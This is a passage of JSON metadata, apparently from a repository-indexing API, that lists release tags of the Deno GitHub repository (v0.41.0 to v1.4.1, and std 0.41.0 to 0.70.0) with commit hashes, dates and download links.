noland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.4